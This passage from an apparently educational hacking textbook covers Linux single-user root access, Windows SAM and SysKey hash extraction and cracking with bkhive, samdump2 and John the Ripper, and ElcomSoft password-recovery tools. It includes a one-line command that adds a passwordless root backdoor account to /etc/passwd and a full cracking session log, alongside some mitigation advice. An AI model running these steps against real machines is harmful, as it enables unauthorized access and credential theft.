(passwd) which is the password file which stores the passwords and usernames of all
accounts on the machine. One thing to remember here is that you can edit the
/etc/passwd file only if you are logged in as root.
However, in this case we are not logged in as root, but still we are able to edit the
password file, as we have booted into Linux single, which gives us the root shell.
To fully understand as to how the above command works, one needs to first
know the structure of the /etc/passwd file.
A typical line from the Unix password file is as follows:
sedulity:my_password_in_encrypted_form:2:3:cmos
knowledge:/home/sedulity:/bin/
The above extract from the Unix password file can, in turn, be broken up
into:
Username: sedulity
Encrypted Password; my_password_in_encrypted_form
User number: 2
Group Number 3
Actual Name: sedulity knowledge (Optional)
Home Directory: /home/sedulity(Optional)
Type of Shell; /bin/bash (Optional)
Coming back to our command, it is important to note that in our command,
We have not included the optional fields and the password field of a typical password
file line. Our command is as follows'.
_______________________________________________________________________________________
echo “sedulity::0:0:::" » /etc/passwd
This above command can also be rewritten as:
Username: sedulity
Encrypted Password:
User number: 0
Group Number: 0
Actual Name:
Home Directory :
Type of shell:
Thus, the command that we typed did nothing but create a new account with root
privileges and without any password. Such a technique can be used to create new
accounts with root privileges, which can then be used as backdoors into the system.
4.17.1 Physical Security
Some Linux vulnerabilities involve the hacker’s actually being at the system console.
4.17.2 Hacks
When a hacker is at the system console, anything goes, including rebooting the system
(even if no one is logged in) simply by pressing Ctrl+Alt+Del. After the system is
rebooted, the hacker can start it up in single-user mode, which allows the hacker to zero
out the root password or possibly even read theentire /etc/passwd or /etc/shadow file.
Edit your /etc/inittab file and remark out (place a # sign in front of) the line that read
ca::ctrlaltdel:/sbin/shutdown -t3 -r now, as shown in the last line of Figure
_______________________________________________________________________________________
Figure 4.5
If you believe that a hacker has recently gained access to your system either physically
or by exploiting a vulnerability such as a weak password or buffer overflow, you can use
the last program to view the last few logins into the system to check for strange login IDs
or login times. This program peruses the /var/log/wtmp file and displays the users who
logged in last. You can enter last | head to view the first part of the file (the first ten lines)
if you want to see the most recent logins.
4.17.4 Patching Linux
Ongoing patching is perhaps the best thing you can do to enhance the security of your
Linux systems. Regardless of the Linux distribution you use, using a tool to assist in
your patching efforts makes your job a lot easier.
4.18.5 Distribution updates
The distribution process is different on every distribution of Linux. You can use the
following tools, based on your specific distribution.
_______________________________________________________________________________________
4.18.5.1 Red Hat
You can use the following tools to update Red Hat Linux systems:
Red Hat Package Manager (RPM), which is the GUI-based application that runs
in the Red Hat GUI desktop. It manages those files with a .rpm extension that
Red Hat and other freeware and open-source developers use to package their
programs.
up2date, a command-line text-based tool that is included in Red Hat.
AutoRPM (www.autorpm.org).
The open-source NRH-up2date (www.nrh-up2date.org).
4.18.5.2 Debian
You can use the Debian Package System (dpkg) included with the operating system to
update Debian Linux systems.
4.18.5.3 Slackware
You can use the Slackware Package Tool (pkgtool) tool included with the operating
system to update Slackware Linux systems.
4.19 SuSE/Novell________________________________
SuSE (now owned by Novell) includes the YaST2 Package Manager.
Cracking Syskey and the SAM on Windows XP, 2000 and NT 4 using Open Source
Tools is a far simpler, faster and more concise way to crack hashes in the SAM file that
are protected by SysKey.
SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was
introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has
had SysKey enabled by default. The way most folks crack a SAM file on a system that
uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN
Manager) and NT hashes.
The problem is PWdump only works if you can run it from an administrator level
account, and if the reason an attacker is cracking the hashes in the first place is to get
an administrator level account then PWdump is of little use.
Some folks will ask why would you want to crack the passwords in the SAM at all since
it’s far easier to just change the Administrator password using a Linux boot disk or
Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the
local passwords instead of changing them is two fold:
1. An attacker doesn’t want to tip off the system administrators. If they notice that the
old local admin password no longer works they will get a little bit suspicious don’t you
_______________________________________________________________________________________
think? This is somewhat solved by Sala’s Password Renew since it lets you add new
admin level accounts as well as change existing account’s passwords.
2. The same local account passwords may be used on other systems on the network
(and most likely are if they use imaging software like Ghost). If the attacker can crack
one machine’s admin password that same password may allow the attacker to gain
access to other boxes on that LAN that they only have remote access (across the
network) to.
This article assumes that the attacker has only physical access to the machine whose
SAM they want to crack and that they also have access to the Knoppix variant known as
the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial).
Here are the steps you will need to take in order to audit local passwords using the
Auditor CD:
Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will
be using in this tutorial come on the Auditor Boot CD.
Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM
as the first boot device in the BIOS. Some systems let you hold down a certain function
key at startup to choose what media to boot from (on recent Dell’s it’s F12).
Step 3. Auditor will begin to boot and ask you what screen resolution you want to use.
Choose a resolution that your monitor and video card will support (I use 2 for 1024x768)
then hit enter.
Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new
terminal window (it looks like a little monitor). Below you will see the commands you will
have to use to get past SysKey, extract the hashes and attempt to crack the password
hashes.
Step 5. Mount the local hard disk, most likely hda1:
Linux Command:
mount /dev/hda1
Step 6. Change the present working directory to the ramdisk so we space to work with
the files we will be creating:
Linux Command:
cd /ramdisk/
_______________________________________________________________________________________
Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using
these tools to extract the system key from the System hive and the password hashes
from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file
(most likely in C:\WINDOWS\system32/config\SYSTEM, that’s where it is on my XP Pro
test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps
some other drive entirely). By the way, if for some reason you are running NT4 SP3 you
will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To
grab the system key and put it into a file we use the following command:
Linux Command:
bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Step 8. Now that we have the system key we can use it to undo SysKey on the SAM,
extract the hashes and place them into a PWDump format file:
Linux Command:
samdump2-linux
hashes.txt
/mnt/hda1/WINDOWS/system32/config/sam
saved-syskey.txt>password-
Step 9. At this point we have a PWDump format file called password-hashes.txt that we
could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old
tutorial for details). As we were going to do it all with the Auditor CD and Open Source
tools we will use John the Ripper to crack the hashes, but before we can use John we
have to extract one of the many wordlists that comes with Auditor. Take a look on the
CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll
use english.txt for this tutorial. To extract english.txt to the ramdisk use the following
command:
Linux Command:
gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
Step 10. Now that everything is in place we can run John with a simple dictionary attack
to see if we can crack any of the hashes:
Linux Command:
john password-hashes.txt -w:eng.txt
_______________________________________________________________________________________
John detects that the dump file has LM (LAN Manager) hashes in it and chooses the
format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes
in the SAM I might want to use the –f option to specify the NT hash format and try to
crack the NT hashes instead. To do that I would use the following command:
Linux Command:
john password-hashes.txt -f:NT -w:eng.txt
If dictionary attacks aren’t working and you have a lot of time (as well as a fast
computer) you can try John’s incremental (brute force) mode and see if it gives you
better results:
Linux Command:
john password-hashes.txt -i:all
Incremental mode is limited to only eight characters unless you change the source
before you compile it, but at more than eight characters you will likely be waiting a very
long time for John to finish. Doing more that eight characters is pointless anyway if you
have the LM hashes since there are stored as two seven byte parts (NT hashes are a
different story and can be harder to crack). In case you were wondering what all of these
commands would look like along with their output here is a copy of my session log that
may help you understand how they all work together (notice that the password for the
Administrator account is “monkey”):
Session Log saved from Auditor :
root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive [email protected]
Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam savedsyskey.txt>password-hashes
.txt
Samdump2 [email protected]
This product includes cryptographic software written
by Eric Young ([email protected])
No password for user Guest(501)
No V value!
_______________________________________________________________________________________
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY
(Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey
(Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#
4 .19.1 Mitigating SAM and SysKey Cracking
There are a few more things that you can do to make it harder for attackers to crack
your local passwords. An attacker will most likely have to get into the BIOs to set it to
boot from the CD-ROM. Setting up a BIOs password will help keep crackers from using
the Auditor CD (or any boot CD) but if they can get into the computer’s case it’s easy to
reset a BIOs password so some sort of physical case lock should be used as well.
Strong passwords (non-dictionary words with more that just alphanumeric characters)
will also make it harder for attackers to crack passwords since they will have to resort to
potentially slow brute force methods.
_______________________________________________________________________________________
Chapter-5
Application Attacks
Session Objectives:
Password
Password-Protected Files
Countermeasures
Other Ways to Crack Passwords
Keystroke Logging
Logging Tools
Countermeasures
Weak Password Storage
Countermeasures
_______________________________________________________________________________________
5.1 Introduction – Password______________________
Passwords to access computer systems are usually stored, typically not in cleartext
form, in a database so the system can perform password verification when users
attempt to login. To preserve confidentiality of system passwords, the password
verification data is typically generated by applying Hash to the password. Even though
functions that create hashed passwords may be cryptographically secure, possession of
a hashed password provides a quick way to test guesses for the password by applying
the function to each guess, and comparing the result to the verification data.
The term password cracking is typically limited to recovery of one or more plaintext
passwords from hashed passwords, but there are also many other ways of obtaining
passwords illicitly; without the hashed version of a password, the attacker can still
attempt access to the computer system in question with guessed passwords. However
well designed systems limit the number of failed access attempts and can alert
administrators to trace the source of the attack if that quota is exceeded. With the
hashed password, the attacker can work undetected, and if the attacker has obtained
several hashed passwords, the chances for cracking at least one is quite high.
Otherwise it is possible to try to obtain the passwords through other different methods,
such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster
diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan
Horse or virus, identity management system attacks (such as abuse of Self-service
password reset) and compromising host security (see password for details). However,
cracking usually designates a guessing attack.
5.2 Guessing___________________________________
Many passwords can be guessed either by humans or by sophisticated cracking
programs armed with dictionaries and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to
themselves in some way. Repeated research over some 40 years has demonstrated
that around 40% of user-chosen passwords are readily guessable by programs.
Blank (none).
The words "password", "passcode", "admin" and their derivatives.
The user's name or login name.
The name of their significant other or another person.
Their birthplace or date of birth or a friend's, or a relative's.
A pet's name.
A dictionary word in any language.
A name of a celebrity they like.
Automobile license plate number.
A row of letters from a standard keyboard layout (e.g., the qwerty keyboard -qwerty itself, asdf, or qwertyuiop).
_______________________________________________________________________________________
A simple modification of one of the preceding, such as suffixing a digit or
reversing the order of the letters, and so on.
5.3 Password-protected files______________________
Do you wonder how vulnerable word-processing, spreadsheet, and zip files are as users
send them into the wild blue yonder? Wonder no more. Some great utilities can show
how easily passwords are cracked.
Cracking files
Most password-protected files can be cracked in seconds or minutes. You can
demonstrate this “wow-factor” security vulnerability to users and management .Here’s a
real-world scenario:
Your CFO wants to send some confidential financial information in an Excel
spreadsheet to the company’s outside financial advisor.
She protects the spreadsheet by assigning a password to it during the file-save
process in Excel 2002.
For good measure, she uses WinZip to compress the file, and adds another
password to make it really secure.
The CFO sends the spreadsheet as an e-mail attachment, assuming that it will
reach its destination securely.
The financial advisor’s network has content filtering, which monitors incoming emails for keywords and file attachments. Unfortunately, the financial advisory
firm’s network administrator is looking in the content filtering system to see what’s
coming in.
This rogue network administrator finds the e-mail with the confidential
attachment, saves the attachment, and realizes that it’s password-protected.
The network administrator remembers some great password-cracking utilities
from ElcomSoft (www.elcomsoft.com) that can help him out. He may see
something like Figures.
5.4 Brute force attack____________________________
Cracking password-protected files is as simple as that! Now all that the rogue network
administrator must do is forward the confidential spreadsheet to his buddies or the
company’s competitors.
If you carefully select the right options in Advanced ZIP Password Recovery and Office
XP Password Recovery, you can drastically shorten your testing time. For example, if
you know that a password is not over 5 characters or is lowercase letters only, you can
cut the cracking time in half.
_______________________________________________________________________________________
A brute force attack is a method of defeating a cryptographic scheme by trying a large
number of possibilities; for example, exhaustively working through all possible keys in
order to decrypt a message. In most schemes, the theoretical possibility of a brute force
attack is recognized, but it is set up in such a way that it would be computationally
infeasible to carry out. Accordingly, one definition of "breaking" a cryptographic scheme
is to find a method faster than a brute force attack.
5.5 ElcomSoft’s Advanced Office XP Password
Recovery:
5.5.1 Selecting a File:
To select a file you want to recover the password(s) for simply press the "Open File"
button (or select the "File | Open File" menu item) and browse for the appropriate file (or
press on a small arrow at the right to load a file you have been working with recently).
File Format will be recognized automatically with corresponding message in the Log
Window. If the specified File Format is not supported by AOPR, or it's corrupted, or used
by another application – the appropriate error message will be displayed.
You can clear the Recent Files list selecting the "File | Clear Files History" menu item.
Figure: 5.1
_______________________________________________________________________________________
5.5.2 Result:
After the File selection, the dialog box with results will be displayed automatically. The
following situations may occur as the result of the File Processing:
All or some Passwords were recovered. The dialog box with passwords is displayed.
Password fields may contain those auxiliary messages:
None - the password is not set;
Cannot be found instantly - the password cannot be recovered instantly, you
must select the Attack Options and Start the Attack to recover this password. You
can create a Project to save the Attack parameters to the file.
Can be changed - the password cannot be recovered, but can be changed or
deleted. In this case a Dialog with results contains two additional buttons:
"Change Password" and "Delete Password". You can change or delete the
password simply clicking those buttons. Selected File must not be write-protected
to complete this operation successfully.
Not available - the Password cannot be recovered by some reason. The
possible reasons are:
Selected File Format does not have such password
Password that decrypts a document is not found yet
error - an error occurred while Password Recovery process. The error message
box is displayed to explain the error.
Figure: 5.2
_______________________________________________________________________________________
Any found Password can be copied to the Clipboard. Simply press the "Copy to
Clipboard" button located at the right of the corresponding Password. You can insert the
copied Password to any field by pressing the "Ctrl-V" buttons combination (usually the
Paste menu item is disabled, but the keyboard shortcut always works). A password
which contains international symbols can be displayed incorrectly on Windows® 95, 98
and Me. These Windows® versions don't support Unicode and therefore we recommend
to use Windows® NT, 2000 or XP to recover passwords with international symbols.
Path to the selected File is displayed under "File Path:" caption. You can open the File
simply clicking the "Open..." button.
5.5.3 Creating and Saving project
If you need to recover the "open" password for Word®/Excel® 97/2000/XP,
PowerPoint® XP or Money 2002/2003/2004 document and this password cannot be
recovered instantly, you may create a project. Project file contains all information about
the source File, selected Options and Character Set. You can simply copy the Project
File to another computer and you don't need to copy the source File -- the Project
contains all information needed to recover a Password.
When you open the file for password recovery and this Password cannot be recovered
instantly, the program creates a new Project automatically. Project files have an ".OPR"
extension. By default the Project name is equal to the source File name. For example if
you're opening the "test.doc" file, the Project name is "test.opr".
When the file is loaded, you can save your project -- all the changes you've made will be
reflected in the project file. The name for the project is selected automatically based on
the name of the file. If you want to give an alternative name – use "File | Save Project
As..." menu item. If you don't want to change the name, just use the "File | Save Project"
menu item.
If a Project was created and you're trying to quit AOPR, the Saving Project Prompt will
be displayed. You can disable this Prompt un-checking the "Prompt if project was
changed" checkbox at the Options tab.
5.5.4 Type of Attack
If a Password cannot be recovered instantly you must use one of the Attack Types. The
following Attack Types are available in AOPR:
_______________________________________________________________________________________
5.5.4.1 Brute-Force Attack:
This Attack will try all possible characters combinations in the specified Range. The
Range is defined by Password Length and Brute-Force Range Options.
1)
Password length
This is one of the most important options affecting checking time. You can check all 4character (and shorter) passwords in a few minutes. But for longer passwords you have
to have patience and/or some knowledge about the password (including the character
set which has been used, or even better – the mask).
AOPR allows you to set a Password Length range by defining the Minimal and Maximal
Length. These values can be set using the "Password Length" controls at the "BruteForce" tab. The minimal length cannot be set to a value greater than maximal one. In
this case the appropriate error message will be displayed.
If the Minimal and Maximal Lengths are not the same, the program tries the shorter
passwords first. For example, if you set Minimal=3 and Maximal=7, the program will
start from 3-character Passwords, then try 4-character ones and so on -- up to 7. While
AOPR is running, it shows the current Password Length, as well as the current
Password, Average Speed, Elapsed and Remaining Time, and Total and Processed
number of passwords (some of these Parameters are displaying in the "Extended
Statistics" Dialog. All of this information except average speed and elapsed time, which
are global, is related only to the current length.
Figure: 5.3
_______________________________________________________________________________________
2)
Brute-force range options
In MS Office documents passwords may contain the following Characters: latin letters
(both small and capital), digits, special symbols (like @, #, $ etc) and national languages
symbols. You can select these Ranges separately, or define your own Password Range.
To define your own range, check the box "Custom charset" and press the "Custom
charset…" button.
The Predefined Passwords Ranges contain the following Characters:
"a - z": abcdefghijklmnopqrstuvwxyz
"A - Z": ABCDEFGHIJKLMNOPQRSTUVWXYZ
"0 - 9": 0123456789
"!@..." (special characters): !@#$%^&*()_+-=<>,./?[]{}~:;`'|"\
"All Printable": contains all Ranges defined above
3)
Password mask
If you already know some characters in the Password, you can specify the Mask to
decrease the total number of passwords to be verified. At the moment, you can set the
Mask only for fixed-length Passwords, but doing this can still help.
For example, you know that the Password contains 8 characters, starts with 'x', and
ends with '99'; the other symbols are small or capital letters. So, the Mask to be set is
"x?????99", and the charset has to be set to All caps and All small. With such options,
the total number of the passwords that AOPR will try will be the same as if you're
working with 5-character passwords which don't contain digits; it is much less than if the
length were set to 8 and the All Printable option were selected. In the above example,
the '?' chars indicate the unknown symbols.
If you know that the Password contains an occurrence of the Mask character '?', you
can choose a different Mask Character to avoid having one character, '?', represent both
an unknown pattern position and a known character. In this case, you could change the
Mask Symbol from '?' to, for example, '#' or '*', and use a mask pattern of "x######?"
(for mask symbol '#') or "x******?" (for mask symbol '*').
You can define your own Character Set for the Brute-Force Attack. Click the "Define
Custom Charset" button at the "Brute-Force" tab. The following Dialog will appear:
4)
Custom Charset
You can enter the Custom charset either in text and HEX format. In HEX format the
Unicode symbols must be separated by Spaces.
_______________________________________________________________________________________
You can Load, Save, Clear and Add Charset by pressing the corresponding buttons.
After entering the Charset AOPR checks for duplicate characters and removes it
automatically.
The following charset’s are included in AOPR distribution:
Arabic (all Arabic symbols according to Unicode standard)
Armenian
Czech (split to caps and small letters)
French (split to caps and small letters)
German (split to caps and small letters)
Greek (all symbols according to Unicode standard)
Greek (letters only)
Hebrew
Japanese (Katakana)
Japanese (Hiragana)
Korean (Hangul Jamo)
Russian (Cyrillic)
If the "Additional charsets" option was selected in installation, these charsets are placed
in the "\charsets" directory.
5)
Dictionary Attack:
This Attack verifies the words stored in the specified Dictionary File. The dictionary is
just the text (ASCII file) with one work at a line; the lines are separated with line breaks.
You can set additional Dictionary Options for this Attack. A Dictionary Attack is much
faster than Brute-Force so we recommend to run it first. AOPR has supplied with one
small Dictionary File containing English words. Additional Dictionaries can be obtained
on a CD with any Elcomsoft program.
To select the needed Attack Type click the corresponding radio button under "Type of
Attack for Documents with Strong Encryption".
Dictionary Options
At first you have to select the desired Dictionary File. Click the "Select Dictionary File..."
button at the "Dictionary" tab and select the needed file.
_______________________________________________________________________________________
In that Attack the program will try all words from it as passwords for the selected
Document. It really helps when the Password has some meaning, i.e. the whole word.
You can select an option "Smart mutations" or "Try all possible upper/lower case
combinations" – it may really help if you're not sure about the register the Password has
been typed in. For example, let's assume that the next word in dictionary is
«PASSword» (the case, actually, doesn't matter here). With the second option enabled,
the program will just try all possible combinations, like:
password
passworD
passwoRd
passwoRD
passwOrd
…
PASSWORd
PASSWORD
However, checking all such combinations takes a lot of time: in the example above, the
program will check 2^8 words (i.e. 256) instead of one. With Smart Mutations, you can
eliminate a number of "virtually impossible" combinations, and here are all the words
which will be checked:
1. PASSword
(as is)
2. passWORD
(reversed)
3. password
(all lower case)
4. PASSWORD
(all upper case)
5. Password
(first uppercase, rest lowercase)
6. pASSWORD
(first lower case, rest uppercase)
7. PaSSWoRD
(elite: vowels in lc, others in uc)
8. pAsswOrd
(noelite)
9. PaSsWoRd
(alt/1)
10. pAsSwOrD
(alt/2)
So, it makes only 10 combinations for each word.
_______________________________________________________________________________________
6)
Auto-Save
If you'd like AOPR to save its state periodically, please check the "Enable Auto-Save"
option at the "Options" tab, and select the time (in minutes) between saves in the
"Intervals" control. If you do that, AOPR will periodically update a Project File – exactly
as if you select the "Save project" menu item yourself. Even if your computer stops
responding (or if power fails), you'll be able to restore breaking the Password from the
last saved state. Enabling this option is strongly recommended.
7)
AOPR Options
AOPR Options can be adjusted at the "Options" tab.
Priority Options: Idle or High. If you want to start AOPR as a "background" process,
which will work only when the CPU is in an idle
state, you may select "Idle". If you want to
increase performance, select "High", but be
aware that this will decrease the performance of
*all other* applications running on your
computer.
"Enable Program Log" option instructs the program to write all messages (the same as
in Log Window) to the "aoxppr.log" file – for future analysis.
"Enable Debug log" option allow to create a
separate log file ("aoxppr_debug_log.txt") with the
detailed information about Outlook® mail
accounts recovery.
Folder for log files: select the folder where
"aoxppr.log" and "aoxppr_debug_log.txt" files will
be created.
Clear files history is not an option, actually, but
just a button – press it to clear the list of files you
opened for password recovery recently. This button is located at the "Recovery" tab.
If you select the Minimize to tray option, the program will hide itself from the screen
when being minimized (so you will not see an appropriate button on Windows® toolbar),
but small icon will be created in the tray (near the system tray). Double-click on it to
restore.
_______________________________________________________________________________________
By disabling the Prompt if project was changed option, you instruct AOPR not to display
the messages like "The project has been changed. Save?", when you've changed some
options and open an another project, or creating a new one.
The Progress bar update interval ("Progress, ms") option allows you to set how often the
program will update the progress bar and display the password which is currently
verified. Higher value will give you slightly better speed; the recommended one is 500
(milliseconds). If the interval is set to 0, the progress bar will not be updated at all (but
you still will be able to stop the process, of course, and resume from that point later).
5.6 Recovering E-Mail account passwords___________
Passwords to Microsoft® Outlook® E-Mail Accounts which were stored locally can be
easily recovered by clicking the "MS Outlook®" button or selecting the "Internet |
Outlook® Mail Accounts..." menu item.
Figure: 5.4
If MS Outlook® has any e-mail accounts configured the following dialog will be
displayed as above:
The following information is given: Server Address, Login, Password, Server Type
(POP3, IMAP or HTTP) and the auxilary string PST (Password Storage Type).
_______________________________________________________________________________________
Outlook® Password Storage Types
Typically, Microsoft® Outlook® stores all passwords in the Protected Storage
subsystem. All passwords are stored in system Registry in encrypted form. However,
some old versions can store account passwords in a plain (unencrypted) form, or
encrypted with weak algorithm (logical XOR operation). In some cases, AOPR can show
wrong passwords, for example if your system Registry is damaged, or you do not have
enough rights (permissions) to Access® some keys in Registry, or Protected Storage
subsystem is not installed on your computer. Displaying of Password Storage Types will
help you to identify why some passwords are displayed incorrectly. Here is a brief
description of Password Storage Types:
PS - Password is successfully retrieved and stored in Protected Storage.
O3 - Password is stored in System Registry by Outlook® 2003
OL - Password is successfully retrieved and stored in system Registry using "old-style"
weak encryption algorithm.
NP - Password was not found in Protected Storage, in some cases it indicates that user
name is used as password, or Protected Storage subsystem is damaged.
UN - Unknown Password Storage Type. You may use version of Outlook® that is not
supported by AOPR, or your system Registry is damaged.
ER - Error in password retrieving.
NR - Password was not retrieved. You do not have enough rights to unlock the
Protected Storage, or Protected Storage is not installed on your machine.
NO - Password for this account is absent.
5.7 IE Content Advisor Password__________________
Internet Explorer Content Advisor Password can be simply changed or deleted by
clicking the "Internet CA" button.
The following dialog will be displayed:
_______________________________________________________________________________________
Figure: 5.5
Check the "Save old Password" checkbox to save the old Password Record. You can
restore the old Password clicking the "Restore saved Password" button. System reboot
may be required to complete the Content Advisor Password changing.
5.8 VBA Backdoor_______________________________
If you have a document with password-protected VBA project, but for some reason the
password cannot be recovered, or the password shown by AOPR cannot be entered (for
example it contains non-English characters that cannot be entered using your
keyboard), or AOPR only allows to change or remove that password (but you would not
like to do that), you can use the "VBA backdoor" feature. It works for all applications
which can create VBA projects in their documents, not only Microsoft® Office (for
example, Corel WordPerfect Office and AutoCAD).
With that feature, the password is not being recovered at all. However, you're able to
open a VBA project (to view/edit the code). Of course you should have the application
(this document has been created with, or later version) installed.
Just press the "VBA Backdoor" button on AOPR toolbar (or select VBA Backdoor | Open
file through backdoor menu item). The program will prompt you for the document file.
Select the file and the following dialog will be displayed:
_______________________________________________________________________________________
Figure: 5.6
Here you set the additional Command Line parameters if needed. AOPR will run the
application (with a special way) this document has been created with, and load your
document into it. Now go into VBA properties (typically, it is under "Tools | Macro |
Visual Basic Editor" or "Tools | VBAProject Properties". You'll be prompted for the
Password. Enter ANY one (e.g., xyz), and it will be accepted!
If your document has been created in Microsoft® Office 97, you can use Office 2000 or
Office XP, too. However, the reverse is not true: if you would like to unprotect Office
2000/XP document, but have only Office 97 -installed, AOPR will still run it (with a
warning message), but Backdoor will not work.
In addition (for example, in the case if the extension of the protected files is not
registered in the system, so AOPR don't know what program to execute), you can just
run the desired application (the one with VBA support: Word®, Excel®, FrontPage,
AutoCad etc) using the same technology: select "VBA Backdoor | Launch application"
menu item. Backdoor will be activated, and for all documents you will open in that
application, any password will be accepted.
Please note that this backdoor is supported only for a limited number of versions of VBA
engine (VBE.DLL or VBE6.DLL) – the ones that were available when current version of
AOPR has been released (the latest one comes with Microsoft® Office 2003). When the
application is executed, AOPR prints (into the Log Window) the size and version number
of that DLL. If your one is not supported yet, AOPR uses "generic" patch, which may fail
under certain circumstances.
5.9 Advanced PDF Password Recovery (APDFPR)____
Advanced PDF Password Recovery (APDFPR) is a program to decrypt protected Adobe
Acrobat PDF files, which have "user" and/or "owner" passwords set, preventing the file
from opening or editing, printing, selecting text and graphics etc.
_______________________________________________________________________________________
With the Standard edition of the program, if only "owner" password is set, password
recovery is not needed at all, but the file is being decrypted instantly (so all restrictions
are being removed). Professional edition can also recover "User" password using bruteforce and dictionary attacks, or instantly from the "Owner" password; also, it supports
the "key search" attack to decrypt PDF files with 40-bit encryption regardless the
password length, guaranteed. In addition, it is able to clean PDF files from JScript code,
form fields and digital signatures. Enterprise edition also includes an improved version
of "key search" attack – it is shipped with a DVD that contains special Thunder tablestm
that allow to decrypt all 40-bit PDF files in just minutes instead of days.
The program that is licensed to you is absolutely legal and you can use it provided that
you are the legal owner of all files or data you are going to recover through the use of
our software or have permission from the legitimate owner to perform these acts. Any
illegal use of our software will be solely your responsibility. Accordingly, you affirm that
you have the legal right to access all data, information and files that have been hidden.
You further attest that the recovered data, passwords and/or files will not be used for
any illegal purpose. Be aware password recovery and the subsequencial data
decryption of unauthorized or otherwise illegally obtained files may constitute theft or
another wrongful action and may result in your civil and (or) criminal prosecution.
Figure: 5.7
_______________________________________________________________________________________
Encrypted PDF file
Just enter the name of the PDF document you'd like to get the password for. Use the
Open button on program toolbar, [File] | [Open File] menu item or F3 key to pick the file
from the list. Alternatively, you can use drag' n 'drop – just drag the file (with a mouse)
from Windows Explorer, and drop it to the APDFPR window.
If Start attack on file select option is enabled, the program analyses the encryption used.
If only "owner" password is set, or any of the passwords ("user" or "owner") is known,
and you just need to remove restrictions from the file, you can decrypt the file
immediately. If the "user" password is set but now known, you have to select other
options and start the attack – consult next chapters for more information’s.
If the file is encrypted using any security method other than standard, APDFPR will
display an error message (that this kind of encryption is not supported), and write a
corresponding record to the log file. If the file is corrupted, or could not be opened for
some other reason, an appropriate error message will be shown. For more information,
please refer to Error messages chapter.
If the file is not encrypted at all, but contains JScript code, form fields or digital
signatures, the program offers to remove any of these elements:
Figure: 5.8
Please note that if the file is password protected or restricted and contain such
elements, it should be processed in two steps: you have to decrypt it first, and then load
the file APDFPR again to remove digital signatures and/or other stuff.
_______________________________________________________________________________________
5.9.1 Type of Attacks
5.9.1.1 Brute-force Attack
Brute-force range options
Instructs the program what characters have been used in the password. You can
choose from all capital letters, all small letters, all digits, all special symbols and the
space, or all printable (includes all of the above). The special characters are:
!@#$%^&*()_+-=<>,./?[]{}~:;`'|"\
Alternatively, you can define your own character set (charset). Just mark the "Userdefined" checkbox and click on "Custom charset…" (at the right of the option). In the
input window, enter all chars of your password range; for example: if you remember that
your password was entered in the bottom keyboard row ("zxcv...bb") - your password
range should be "zxcvbnm,./" (or in caps: "ZXCVBNM<>?"). You can also define both of
these: "zxcvbnm,./ZXCVBNM<>?". In addition, you can load and save custom charsets, or
combine them using the "Add charset from file..." button.
Figure: 5.9
5.9.1.2 Start from password
This option may help, for example, if you know the first character(s) of the password.
For example, if you're sure that the small letters have been used (from 'a' to 'z'), the
length is 5, and the password definitely starts with 'k', than type 'kaaaa' here. Please
also note, that if you press the "Stop" button when APDFPR is working, the program
writes the current password to this window ("Start from password"). It can be used later
to restart the program from the same point.
Please note that the program verifies the passwords according to the following character
order:
_______________________________________________________________________________________
CAPITAL letters: 'A'..'Z'
The space
Small letters: 'a'..'z')
Digits: '0'..'9'
Special characters: !@#$%^&*()_+-=<>,./?[]{}~:;`'|"\
You can also use End at field to set the password APDFPR should stop at. It might be
useful if you attack the same document on a few computers, and so can split the whole
password range onto a few parts.
5.9.1.3 Password mask
If you already know some characters in the password, you can specify the mask to
decrease the total number of passwords to be verified. At the moment, you can set the
mask only for fixed-length passwords, but doing this can still help.
For example, you know that the password contains 8 characters, starts with 'x', and
ends with '99'; the other symbols are small or capital letters. So, the mask to be set is
"x?????99", and the charset has to be set to All caps and All small. With such options,
the total number of the passwords that APDFPRwill try will be the same as if you're
working with 5-character passwords which don't contain digits; it is much less than if the
length were set to 8 and the All Printable option were selected. In the above example,
the '?' chars indicate the unknown symbols.
If you know that the password contains an occurrence of the mask character '?', you can
choose a different mask character to avoid having one character, '?', represent both an
unknown pattern position and a known character. In this case, you could change the
mask symbol from '?' to, for example, '#' or '*', and use a mask pattern of "x######?"
(for mask symbol '#') or "x******?" (for mask symbol '*'). Select the mask symbol on
Advanced Options page.
5.9.1.4 Password length
This is one of the most important options affecting checking time. Usually, you can test
all short passwords in just a few minutes; but for longer passwords, you have to have
patience and/or some knowledge about the password (including the character set which
has been used, or even better – the mask).
The minimum length cannot be set to a value greater than maximum length, of course.
_______________________________________________________________________________________
Figure: 5.10
